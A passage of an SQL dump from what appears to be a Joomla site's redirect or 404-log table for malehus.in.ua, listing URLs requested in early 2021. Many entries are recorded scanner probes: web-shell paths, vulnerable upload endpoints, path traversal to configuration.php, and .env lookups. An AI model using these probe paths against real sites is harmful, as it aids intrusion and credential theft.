00:00:00',301),(36194,'https://malehus.in.ua/sites/all/libraries/elfinder/elfinder.html',NULL,'http://www.google.com/','',1,0,'2021-01-10 17:07:32','0000-00-00 00:00:00',301),(36195,'https://malehus.in.ua/misc/print.css',NULL,'http://www.google.com/','',1,0,'2021-01-11 20:36:56','0000-00-00 00:00:00',301),(36196,'https://malehus.in.ua/themes/readme.txt',NULL,'http://www.google.com/','',1,0,'2021-01-12 09:49:27','0000-00-00 00:00:00',301),(36197,'https://malehus.in.ua/sites/all/libraries/elfinder/src/connectors/php/connector.php',NULL,'http://www.google.com/','',2,0,'2021-01-12 13:32:43','0000-00-00 00:00:00',301),(36198,'https://malehus.in.ua/sites/all/libraries/elfinder/connectors/php/connector.php',NULL,'http://www.google.com/','',3,0,'2021-01-12 13:32:44','0000-00-00 00:00:00',301),(36199,'https://malehus.in.ua/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',3,0,'2021-01-12 20:22:02','0000-00-00 00:00:00',301),(36200,'https://malehus.in.ua/plugins/content/apismtp/apismtp.php?test=hello',NULL,'','',3,0,'2021-01-12 20:22:19','0000-00-00 00:00:00',301),(36201,'https://malehus.in.ua/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'','',1,0,'2021-01-12 20:22:39','0000-00-00 00:00:00',301),(36202,'https://malehus.in.ua/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'','',1,0,'2021-01-12 20:22:56','0000-00-00 00:00:00',301),(36203,'https://malehus.in.ua/https://malehus.in.ua/images/stories/4293668.gif',NULL,'','',1,0,'2021-01-13 09:49:00','0000-00-00 00:00:00',301),(36204,'https://malehus.in.ua/https://malehus.in.ua/images/stories/rizdvo.jpg',NULL,'','',25,0,'2021-01-16 05:24:29','0000-00-00 00:00:00',301),(36205,'https://malehus.in.ua/https://malehus.in.ua/images/stories/2021_1.jpg',NULL,'','',1,0,'2021-01-18 22:26:24','0000-00-00 00:00:00',301),(36206,'https://malehus.in.ua/index.php/foto/fotohalereia/malynshchyna ok',NULL,'','',1,0,'2021-01-19 16:44:04','0000-00-00 00:00:00',301),(36207,'https://malehus.in.ua/components/com_acym/index.html',NULL,'http://www.google.com/','',1,0,'2021-01-29 21:09:55','0000-00-00 00:00:00',301),(36208,'https://malehus.in.ua/.well-known/security.txt',NULL,'','',4,0,'2021-01-30 10:04:36','0000-00-00 00:00:00',301),(36209,'https://malehus.in.ua/components/com_acym/acym.php',NULL,'http://www.google.com/','',1,0,'2021-01-30 10:42:30','0000-00-00 00:00:00',301),(36210,'https://malehus.in.ua/index.php?option=com_acym&ctrl=frontmails&task=setnewiconshare',NULL,'http://www.google.com/','',17,0,'2021-02-01 11:28:41','0000-00-00 00:00:00',301),(36211,'https://malehus.in.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://www.google.com/','',3,0,'2021-02-02 12:24:05','0000-00-00 00:00:00',301),(36212,'https://malehus.in.ua/wordpress/wp-login.php',NULL,'','',77,0,'2021-02-03 05:40:24','0000-00-00 00:00:00',301),(36213,'https://malehus.in.ua/blog/wp-login.php',NULL,'','',80,0,'2021-02-03 05:40:25','0000-00-00 00:00:00',301),(36214,'https://malehus.in.ua/wp/wp-login.php',NULL,'','',78,0,'2021-02-03 05:40:26','0000-00-00 00:00:00',301),(36215,'https://malehus.in.ua/administrator/images/stories/lozeval.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-02-03 09:19:44','0000-00-00 00:00:00',301),(36216,'https://malehus.in.ua/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',3,0,'2021-02-07 19:17:51','0000-00-00 00:00:00',301),(36217,'https://malehus.in.ua/media/com_acym/upload/socials/xxxdddshell.php',NULL,'http://www.google.com/','',2,0,'2021-02-07 19:17:52','0000-00-00 00:00:00',301),(36218,'https://malehus.in.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',3,0,'2021-02-07 19:17:53','0000-00-00 00:00:00',301),(36219,'https://malehus.in.ua/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'https://malehus.in.ua/','',2,0,'2021-02-12 17:57:58','0000-00-00 00:00:00',301),(36220,'https://malehus.in.ua/https://malehus.in.ua/images/stories/lozeval.jpg',NULL,'','',1,0,'2021-02-14 14:31:53','0000-00-00 00:00:00',301),(36221,'https://malehus.in.ua//web/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2021-02-17 20:51:48','0000-00-00 00:00:00',301),(36222,'https://malehus.in.ua//2018/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2021-02-17 20:51:49','0000-00-00 00:00:00',301),(36223,'https://malehus.in.ua//2019/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2021-02-17 20:51:49','0000-00-00 00:00:00',301),(36224,'https://malehus.in.ua//shop/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2021-02-17 20:51:49','0000-00-00 00:00:00',301),(36225,'https://malehus.in.ua//wp1/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2021-02-17 20:51:49','0000-00-00 00:00:00',301),(36226,'https://malehus.in.ua//test/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2021-02-17 20:51:50','0000-00-00 00:00:00',301),(36227,'https://malehus.in.ua/fr-dii fr-fin',NULL,'','',8,0,'2021-02-18 05:59:04','0000-00-00 00:00:00',301),(36228,'https://malehus.in.ua/img src=\'/old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'https://malehus.in.ua/','',6,0,'2021-02-18 23:49:08','0000-00-00 00:00:00',301),(36229,'https://malehus.in.ua/old.kurs.com.ua/ua/informer',NULL,'https://malehus.in.ua/','',1,0,'2021-02-18 23:49:11','0000-00-00 00:00:00',301),(36230,'https://malehus.in.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',3,0,'2021-02-22 10:13:33','0000-00-00 00:00:00',301),(36231,'https://malehus.in.ua/https://malehus.in.ua/images/stories/1612_1.jpg',NULL,'','',1,0,'2021-02-25 03:36:32','0000-00-00 00:00:00',301),(36232,'https://malehus.in.ua/freichat/client/plugins/upload/upload.php',NULL,'http://www.google.com/','',9,0,'2021-02-27 07:46:53','0000-00-00 00:00:00',301),(36233,'https://www.malehus.in.ua/img src=\'/old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',11,0,'2021-02-27 13:08:41','0000-00-00 00:00:00',301),(36234,'https://malehus.in.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://www.google.com/','',3,0,'2021-02-27 23:57:34','0000-00-00 00:00:00',301),(36235,'https://malehus.in.ua/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'http://www.google.com/','',5,0,'2021-02-27 23:57:35','0000-00-00 00:00:00',301),(36236,'https://malehus.in.ua/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2021-02-28 13:16:58','0000-00-00 00:00:00',301),(36237,'https://malehus.in.ua/asd123_-qwd23qd32q3exaqdqwdaf8weyf67iwedgaw76g4',NULL,'','',1,0,'2021-03-01 17:36:54','0000-00-00 00:00:00',301),(36238,'https://malehus.in.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',2,0,'2021-03-01 17:37:09','0000-00-00 00:00:00',301),(36239,'https://malehus.in.ua/cache/mod_bt_contentslider/1d2d8ca7760449c235e1f6a0d…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:29','0000-00-00 00:00:00',301),(36240,'https://malehus.in.ua/cache/mod_bt_contentslider/8d76b7c082ea5c3eccb1d5b85…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36241,'https://malehus.in.ua/cache/mod_bt_contentslider/1187f6e76c8711bc4da63df08…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36242,'https://malehus.in.ua/cache/mod_bt_contentslider/962edb76c127074b00cc6dca2…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36243,'https://malehus.in.ua/cache/mod_bt_contentslider/ebdd74da25474428a7a65c32e…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36244,'https://malehus.in.ua/cache/mod_bt_contentslider/9fb993f8fb2bdb708fdf694ed…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36245,'https://malehus.in.ua/cache/mod_bt_contentslider/82575619bad800c279769ef6f…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36246,'https://malehus.in.ua/cache/mod_bt_contentslider/4eaff3800dcf4f3f65d3acc00…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36247,'https://malehus.in.ua/cache/mod_bt_contentslider/a4ebd44e67d234bf8d88cbc0a…',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',8,0,'2021-03-01 17:37:30','0000-00-00 00:00:00',301),(36248,'https://malehus.in.ua/asset-manifest.json',NULL,'https://malehus.in.ua/index.php/8-novini-2/2493-z-novim-2021-rokom','',11,0,'2021-03-01 17:37:31','0000-00-00 00:00:00',301),(36249,'https://malehus.in.ua/images/phocagallery/fotogaleri_golub/thumbs/phoca_thumb_m_gpost_20200903_…',NULL,'https://malehus.in.ua/index.php/foto/fotohalereia','',1,0,'2021-03-01 17:37:59','0000-00-00 00:00:00',301),(36250,'https://malehus.in.ua/images/phocagallery/fotogaleri_biligolub/thumbs/phoca_thumb_m_gpost_20200…',NULL,'https://malehus.in.ua/index.php/foto/fotohalereia','',1,0,'2021-03-01 17:37:59','0000-00-00 00:00:00',301),(36251,'https://malehus.in.ua/administrator/images/stories/img_20210305_103303.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-03-05 16:58:37','0000-00-00 00:00:00',301),(36252,'https://malehus.in.ua/administrator/images/stories/img_20210305_093837.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-03-05 17:00:44','0000-00-00 00:00:00',301),(36253,'https://malehus.in.ua/https://malehus.in.ua/images/stories/img_20210305_103303.jpg',NULL,'','',1,0,'2021-03-05 17:07:33','0000-00-00 00:00:00',301),(36254,'https://malehus.in.ua/administrator/images/stories/0_0_01.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-03-05 17:47:47','0000-00-00 00:00:00',301),(36255,'https://malehus.in.ua/plugins/jshopping/jquery_file_upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2021-03-08 08:10:57','0000-00-00 00:00:00',301),(36256,'https://malehus.in.ua/backup.sql',NULL,'','',1,0,'2021-03-08 18:02:17','0000-00-00 00:00:00',301),(36257,'https://malehus.in.ua/wp-includes/js/jquery/jquery.js',NULL,'','',2,0,'2021-03-11 01:20:17','0000-00-00 00:00:00',301),(36258,'https://malehus.in.ua/images/vuln2.php',NULL,'','',1,0,'2021-03-11 01:20:26','0000-00-00 00:00:00',301),(36259,'https://malehus.in.ua/tmp/vuln2.php',NULL,'','',1,0,'2021-03-11 01:20:27','0000-00-00 00:00:00',301),(36260,'https://malehus.in.ua/images/vuln.php',NULL,'','',5,0,'2021-03-11 01:20:28','0000-00-00 00:00:00',301),(36261,'https://malehus.in.ua/tmp/vuln.php',NULL,'','',3,0,'2021-03-11 01:20:30','0000-00-00 00:00:00',301),(36262,'https://malehus.in.ua/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2021-03-11 01:20:37','0000-00-00 00:00:00',301),(36263,'https://malehus.in.ua/components/com_foxcontact/foxcontact.php',NULL,'','',1,0,'2021-03-11 01:20:39','0000-00-00 00:00:00',301),(36264,'https://malehus.in.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php',NULL,'','',1,0,'2021-03-11 01:20:40','0000-00-00 00:00:00',301),(36265,'https://malehus.in.ua/components/com_b2jcontact/vuln.php',NULL,'','',1,0,'2021-03-11 01:20:41','0000-00-00 00:00:00',301),(36266,'https://malehus.in.ua/index.php?option=com_jwallpapers&task=upload',NULL,'','',2,0,'2021-03-11 01:20:46','0000-00-00 00:00:00',301),(36267,'https://malehus.in.ua/jwallpapers_files/plupload/up.php',NULL,'','',1,0,'2021-03-11 01:20:47','0000-00-00 00:00:00',301),(36268,'https://malehus.in.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',1,0,'2021-03-11 01:20:47','0000-00-00 00:00:00',301),(36269,'https://malehus.in.ua/tmp/up.php',NULL,'','',2,0,'2021-03-11 01:20:48','0000-00-00 00:00:00',301),(36270,'https://malehus.in.ua/tmp/vuln.php.xxxjpg',NULL,'','',1,0,'2021-03-11 01:20:52','0000-00-00 00:00:00',301),(36271,'https://malehus.in.ua/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2021-03-11 01:20:53','0000-00-00 00:00:00',301),(36272,'https://malehus.in.ua/modules/megamenu/uploadify/up.php',NULL,'','',1,0,'2021-03-11 01:20:54','0000-00-00 00:00:00',301),(36273,'https://malehus.in.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',3,0,'2021-03-11 01:20:55','0000-00-00 00:00:00',301),(36274,'https://malehus.in.ua/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',1,0,'2021-03-11 01:20:56','0000-00-00 00:00:00',301),(36275,'https://malehus.in.ua/index.php?option=com_myblog&task=ajaxupload',NULL,'','',4,0,'2021-03-11 01:21:02','0000-00-00 00:00:00',301),(36276,'https://malehus.in.ua/images/pwn.gif',NULL,'','',1,0,'2021-03-11 01:21:03','0000-00-00 00:00:00',301),(36277,'https://malehus.in.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2021-03-11 01:21:09','0000-00-00 00:00:00',301),(36278,'https://malehus.in.ua/images/stories/up.php',NULL,'','',2,0,'2021-03-11 01:21:15','0000-00-00 00:00:00',301),(36279,'https://malehus.in.ua/images/stories/pwn.gif',NULL,'','',2,0,'2021-03-11 01:21:19','0000-00-00 00:00:00',301),(36280,'https://malehus.in.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2021-03-11 01:21:20','0000-00-00 00:00:00',301),(36281,'https://malehus.in.ua/media/vuln.txt',NULL,'','',1,0,'2021-03-11 01:21:21','0000-00-00 00:00:00',301),(36282,'https://malehus.in.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2021-03-11 01:21:21','0000-00-00 00:00:00',301),(36283,'https://malehus.in.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2021-03-11 01:21:22','0000-00-00 00:00:00',301),(36284,'https://malehus.in.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2021-03-11 01:21:23','0000-00-00 00:00:00',301),(36285,'https://malehus.in.ua/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',1,0,'2021-03-11 01:21:24','0000-00-00 00:00:00',301),(36286,'https://malehus.in.ua/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',1,0,'2021-03-11 01:21:25','0000-00-00 00:00:00',301),(36287,'https://malehus.in.ua/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2021-03-11 01:21:31','0000-00-00 00:00:00',301),(36288,'https://malehus.in.ua/components/com_sexycontactform/fileupload/',NULL,'','',1,0,'2021-03-11 01:21:32','0000-00-00 00:00:00',301),(36289,'https://malehus.in.ua/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2021-03-11 01:21:33','0000-00-00 00:00:00',301),(36290,'https://malehus.in.ua/vendor/phpunit/phpunit/build.xml',NULL,'','',1,0,'2021-03-11 01:21:34','0000-00-00 00:00:00',301),(36291,'https://malehus.in.ua/.env',NULL,'','',209,0,'2021-03-11 01:21:43','0000-00-00 00:00:00',301),(36292,'https://malehus.in.ua/admin',NULL,'','',7,0,'2021-03-11 11:40:19','0000-00-00 00:00:00',301),(36293,'https://malehus.in.ua/store/admin',NULL,'','',5,0,'2021-03-11 11:40:35','0000-00-00 00:00:00',301),(36294,'https://malehus.in.ua/shop/admin',NULL,'','',5,0,'2021-03-11 11:40:50','0000-00-00 00:00:00',301),(36295,'https://malehus.in.ua//2020/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2021-03-13 02:57:11','0000-00-00 00:00:00',301),(36296,'https://malehus.in.ua/components/com_acying/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2021-03-13 20:38:26','0000-00-00 00:00:00',301),(36297,'https://malehus.in.ua/cde42170f4f5b29105ed3977c1f5f4d1.php',NULL,'http://www.google.com/','',1,0,'2021-03-18 09:37:16','0000-00-00 00:00:00',301),(36298,'https://malehus.in.ua/license.php',NULL,'http://www.google.com/','',12,0,'2021-03-18 09:41:46','0000-00-00 00:00:00',301),(36299,'https://malehus.in.ua/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://www.google.com/','',3,0,'2021-03-18 09:46:08','0000-00-00 00:00:00',301),(36300,'https://malehus.in.ua/opencart/admin',NULL,'','',2,0,'2021-03-18 18:10:40','0000-00-00 00:00:00',301),(36301,'https://malehus.in.ua/include.php',NULL,'http://www.google.com/','',1,0,'2021-03-19 17:02:55','0000-00-00 00:00:00',301),(36302,'https://malehus.in.ua/footer.php',NULL,'http://www.google.com/','',1,0,'2021-03-19 17:02:56','0000-00-00 00:00:00',301),(36303,'https://malehus.in.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://www.google.com/','',3,0,'2021-03-19 17:02:56','0000-00-00 00:00:00',301),(36304,'https://malehus.in.ua/repair.php',NULL,'http://www.google.com/','',1,0,'2021-03-19 17:02:57','0000-00-00 00:00:00',301),(36305,'https://malehus.in.ua/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://www.google.com/','',3,0,'2021-03-19 17:02:57','0000-00-00 00:00:00',301),(36306,'https://malehus.in.ua/modules/mod_ppc_simple_spotlight/img/hat.php.gif?hat=1',NULL,'http://www.google.com/','',1,0,'2021-03-20 09:11:16','0000-00-00 00:00:00',301),(36307,'https://malehus.in.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'http://www.google.com/','',3,0,'2021-03-20 22:19:53','0000-00-00 00:00:00',301),(36308,'https://malehus.in.ua/components/com_sexycontactform/fileupload/index.php',NULL,'http://www.google.com/','',4,0,'2021-03-20 22:19:54','0000-00-00 00:00:00',301),(36309,'https://malehus.in.ua/modules/mod_dionefileuploader/upload.php',NULL,'http://www.google.com/','',2,0,'2021-03-21 10:53:00','0000-00-00 00:00:00',301),(36310,'https://malehus.in.ua/modules/mod_artuploader/js/ajaxupload.js',NULL,'http://www.google.com/','',1,0,'2021-03-21 10:53:01','0000-00-00 00:00:00',301),(36311,'https://malehus.in.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'http://www.google.com/','',2,0,'2021-03-21 10:53:54','0000-00-00 00:00:00',301),(36312,'https://malehus.in.ua/components/com_creativecontactform/fileupload/index.php?file=trg3hf.jpg',NULL,'http://www.google.com/','',3,0,'2021-03-21 10:56:25','0000-00-00 00:00:00',301),(36313,'https://malehus.in.ua/plugins/content/apismtp/josmtpapi.php?test=hello',NULL,'http://www.google.com/','',2,0,'2021-03-21 21:59:51','0000-00-00 00:00:00',301),(36314,'https://malehus.in.ua/user/login',NULL,'','',1,0,'2021-03-24 06:36:15','0000-00-00 00:00:00',301),(36315,'https://malehus.in.ua/index.php/component/k2/item/4',NULL,'http://malehus.in.ua/index.php/component/k2/item/4','',6,0,'2021-03-25 15:23:19','0000-00-00 00:00:00',301),(36316,'https://malehus.in.ua/index.php/component/k2/item/7',NULL,'http://malehus.in.ua/index.php/component/k2/item/7','',2,0,'2021-03-25 16:29:48','0000-00-00 00:00:00',301),(36317,'https://malehus.in.ua/index.php/component/k2/item/5',NULL,'http://malehus.in.ua/index.php/component/k2/item/5','',2,0,'2021-03-25 17:29:42','0000-00-00 00:00:00',301),(36318,'https://malehus.in.ua/index.php/component/k2/item/11',NULL,'http://malehus.in.ua/index.php/component/k2/item/11','',2,0,'2021-03-25 17:37:32','0000-00-00 00:00:00',301),(36319,'https://malehus.in.ua/index.php/component/k2/item/8',NULL,'http://malehus.in.ua/index.php/component/k2/item/8','',3,0,'2021-03-25 19:46:25','0000-00-00 00:00:00',301),(36320,'https://malehus.in.ua/index.php/component/k2/item/10',NULL,'http://malehus.in.ua/index.php/component/k2/item/10','',3,0,'2021-03-25 20:20:38','0000-00-00 00:00:00',301),(36321,'https://malehus.in.ua/index.php/component/k2/item/13',NULL,'http://malehus.in.ua/index.php/component/k2/item/13','',5,0,'2021-03-25 20:21:52','0000-00-00 00:00:00',301),(36322,'https://malehus.in.ua/index.php/component/k2/item/1',NULL,'http://malehus.in.ua/index.php/component/k2/item/1','',4,0,'2021-03-25 20:56:05','0000-00-00 00:00:00',301),(36323,'https://malehus.in.ua/index.php/component/k2/item/15',NULL,'http://malehus.in.ua/index.php/component/k2/item/15','',1,0,'2021-03-25 22:39:47','0000-00-00 00:00:00',301),(36324,'https://malehus.in.ua/index.php/component/k2/item/9',NULL,'http://malehus.in.ua/index.php/component/k2/item/9','',3,0,'2021-03-26 04:49:08','0000-00-00 00:00:00',301),(36325,'https://malehus.in.ua/index.php/component/k2/item/2',NULL,'http://malehus.in.ua/index.php/component/k2/item/2','',1,0,'2021-03-26 11:12:08','0000-00-00 00:00:00',301),(36326,'https://malehus.in.ua/administrator/images/stories/010.gif',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-03-27 05:48:53','0000-00-00 00:00:00',301),(36327,'https://malehus.in.ua/index.php/component/k2/item/3',NULL,'http://malehus.in.ua/index.php/component/k2/item/3','',1,0,'2021-03-27 23:57:22','0000-00-00 00:00:00',301),(36328,'https://malehus.in.ua/index.php/component/k2/item/25',NULL,'http://malehus.in.ua/index.php/component/k2/item/25','',2,0,'2021-03-28 00:13:00','0000-00-00 00:00:00',301),(36329,'https://malehus.in.ua/index.php/component/k2/item/6',NULL,'http://malehus.in.ua/index.php/component/k2/item/6','',1,0,'2021-03-28 01:15:29','0000-00-00 00:00:00',301),(36330,'https://malehus.in.ua/index.php/component/k2/item/24',NULL,'http://malehus.in.ua/index.php/component/k2/item/24','',1,0,'2021-03-28 04:54:04','0000-00-00 00:00:00',301),(36331,'https://malehus.in.ua/index.php/component/k2/item/28',NULL,'http://malehus.in.ua/index.php/component/k2/item/28','',1,0,'2021-03-28 04:54:34','0000-00-00 00:00:00',301),(36332,'https://malehus.in.ua/https://malehus.in.ua/images/stories/prazifen1.jpg',NULL,'','',1,0,'2021-03-28 06:34:36','0000-00-00 00:00:00',301),(36333,'https://malehus.in.ua/index.php/component/k2/item/17',NULL,'http://malehus.in.ua/index.php/component/k2/item/17','',1,0,'2021-03-28 08:49:11','0000-00-00 00:00:00',301),(36334,'https://malehus.in.ua/index.php/component/k2/item/23',NULL,'http://malehus.in.ua/index.php/component/k2/item/23','',1,0,'2021-03-28 09:01:55','0000-00-00 00:00:00',301),(36335,'https://malehus.in.ua/index.php/component/k2/item/21',NULL,'http://malehus.in.ua/index.php/component/k2/item/21','',2,0,'2021-03-28 09:05:10','0000-00-00 00:00:00',301),(36336,'https://malehus.in.ua/index.php/component/k2/item/18',NULL,'http://malehus.in.ua/index.php/component/k2/item/18','',1,0,'2021-03-28 09:45:10','0000-00-00 00:00:00',301),(36337,'https://malehus.in.ua/index.php/component/k2/item/30',NULL,'http://malehus.in.ua/index.php/component/k2/item/30','',1,0,'2021-03-28 11:03:41','0000-00-00 00:00:00',301),(36338,'https://malehus.in.ua/index.php/component/k2/item/29',NULL,'http://malehus.in.ua/index.php/component/k2/item/29','',1,0,'2021-03-28 12:59:06','0000-00-00 00:00:00',301),(36339,'https://malehus.in.ua/index.php/component/k2/item/14',NULL,'http://malehus.in.ua/index.php/component/k2/item/14','',1,0,'2021-03-28 14:55:29','0000-00-00 00:00:00',301),(36340,'https://malehus.in.ua/index.php/component/k2/item/26',NULL,'http://malehus.in.ua/index.php/component/k2/item/26','',1,0,'2021-03-28 15:32:44','0000-00-00 00:00:00',301),(36341,'https://malehus.in.ua/wp/',NULL,'','',5,0,'2021-04-02 17:49:56','0000-00-00 00:00:00',301),(36342,'https://malehus.in.ua/blog/',NULL,'','',5,0,'2021-04-02 17:49:57','0000-00-00 00:00:00',301),(36343,'https://malehus.in.ua/wordpress/',NULL,'','',4,0,'2021-04-02 17:49:57','0000-00-00 00:00:00',301),(36344,'https://malehus.in.ua/site/',NULL,'','',1,0,'2021-04-02 17:49:59','0000-00-00 00:00:00',301),(36345,'https://malehus.in.ua/cms/',NULL,'','',1,0,'2021-04-02 17:49:59','0000-00-00 00:00:00',301),(36346,'https://malehus.in.ua/web/',NULL,'','',1,0,'2021-04-02 17:50:01','0000-00-00 00:00:00',301),(36347,'https://malehus.in.ua/news/',NULL,'','',1,0,'2021-04-02 17:50:02','0000-00-00 00:00:00',301),(36348,'https://malehus.in.ua/home/',NULL,'','',2,0,'2021-04-02 17:50:02','0000-00-00 00:00:00',301),(36349,'https://malehus.in.ua/new/',NULL,'','',4,0,'2021-04-02 17:50:03','0000-00-00 00:00:00',301),(36350,'https://malehus.in.ua/https://malehus.in.ua/images/stories/0_0_01.jpg',NULL,'','',1,0,'2021-04-09 00:04:58','0000-00-00 00:00:00',301),(36351,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=7',NULL,'','',9,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36352,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=2',NULL,'','',9,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36353,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=5',NULL,'','',9,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36354,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=3',NULL,'','',9,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36355,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=4',NULL,'','',9,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36356,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=6',NULL,'','',8,0,'2021-04-15 05:48:33','0000-00-00 00:00:00',301),(36357,'https://malehus.in.ua/components/com_jbusinessdirectory/assets/upload.php',NULL,'http://www.google.com/','',14,0,'2021-04-15 22:45:42','0000-00-00 00:00:00',301),(36358,'https://malehus.in.ua/administrator/images/stories/unnamed.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',5,0,'2021-04-17 11:29:32','0000-00-00 00:00:00',301),(36359,'https://malehus.in.ua/administrator/index.php_?tabaka',NULL,'','',1,0,'2021-04-17 11:38:26','0000-00-00 00:00:00',301),(36360,'https://malehus.in.ua/modules/mod_impact/elements/upload_file.php',NULL,'http://www.google.com/','',2,0,'2021-04-18 12:37:06','0000-00-00 00:00:00',301),(36361,'https://malehus.in.ua/administrator/images/stories/img_20210418_172952_tigr.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-04-18 15:41:55','0000-00-00 00:00:00',301),(36362,'https://malehus.in.ua/administrator/images/stories/img_20210418_172612.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-04-18 15:42:37','0000-00-00 00:00:00',301),(36363,'https://malehus.in.ua/https://malehus.in.ua/images/stories/img_20210418_172952_tigr.jpg',NULL,'','',4,0,'2021-04-18 15:49:47','0000-00-00 00:00:00',301),(36364,'https://malehus.in.ua/administrator/images/stories/img_20210418_17328788709_tigr.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',3,0,'2021-04-18 15:55:28','0000-00-00 00:00:00',301),(36365,'https://malehus.in.ua/https://malehus.in.ua/images/stories/img_20210418_17328788709_tigr.jpg',NULL,'','',2,0,'2021-04-18 16:03:24','0000-00-00 00:00:00',301),(36366,'https://malehus.in.ua/core/.env',NULL,'','',48,0,'2021-04-26 00:43:11','0000-00-00 00:00:00',301),(36367,'https://malehus.in.ua/app/.env',NULL,'','',32,0,'2021-04-26 00:43:48','0000-00-00 